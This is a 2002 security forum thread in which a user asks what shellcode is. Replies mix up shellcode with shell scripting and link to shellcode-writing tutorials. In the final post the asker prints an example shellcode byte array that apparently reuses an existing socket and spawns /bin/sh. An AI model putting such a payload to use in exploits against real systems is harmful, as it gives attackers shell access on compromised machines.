|
-
July 20th, 2002, 09:47 AM
#1
Member
 Shellcode
I've noticed that a alot of exploits use shellcode to execute code as the UID of the server/program. Could someone please explain or give some references as to what shellcode is and how it works? What is the relationship between shellcode and assembly? Any info on the topic would be appreciated, thanks.
--Sudo
-
July 20th, 2002, 11:42 AM
#2
Member
When you say shell code you mean shell scripting?
Shell scripting in Unix is like writing batch files in Windows but much more usefull. It would be useful to read shell man page (eg. if you using bash then type "man bash").
I don't see any relationships between assembly and shell scripting.
I recommend that you read http://www.tldp.org/LDP/abs/html/.
Give man a fish and he will ask for more.
Teach man to fish and he will never ask again.
\"Chinese proverb\"
-
July 20th, 2002, 11:47 AM
#3
Junior Member
Well just a search on google will give you this results:
http://www.shellcode.com.ar/docz/bof...efmt-howto.txt
http://www.phrack.com/show.php?p=57&a=5 (WRITING SHELLCODE FOR IA-64)
http://www.w00w00.org/files/shellcode/ ( Index of /files/shellcode )
http://www24.brinkster.com/neolabs/p...shellcode.html (Programming a shellcode in SCO)
and etc...
I hope this wouldn't be used for illegal ativities.
-
July 20th, 2002, 01:39 PM
#4
Assembly is a programming language, some might say it's THE programming language, it's about as close the machine as you can get without useing 1's and 0's. Shell scripts are just scripts that are interprited by the shell you are useing. Shell scripts are great for automating tasks on a *nix box and interfaceing with pearl.
Alternate realities celebrate reality. If you cant handle the reality your in, then you wont be able to handle the one your attempting to escape to.
-
July 20th, 2002, 02:44 PM
#5
Senior Member
i don't know how much detail you are looking for, this article may be of service at a very low level for your last question:
http://droby10.addr.com/tutorial/bof/appendage1.html
-
July 20th, 2002, 05:29 PM
#6
Member
When you say shell code you mean shell scripting?
No, When I say shellcode, I do not mean shell scripting. Here is an example of some shellcode:
char shellcode[] =
"\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
"\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
"\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
"\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
"\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
"\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
"\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
"\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";
Thanks for the links Droby and Cicatrix. It looks like some heavy stuff.
Originally posted here by Cicatrix
I hope this wouldn't be used for illegal ativities.
No no no... I am just a VERY curious guy.. Thanks.
--Sudo
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote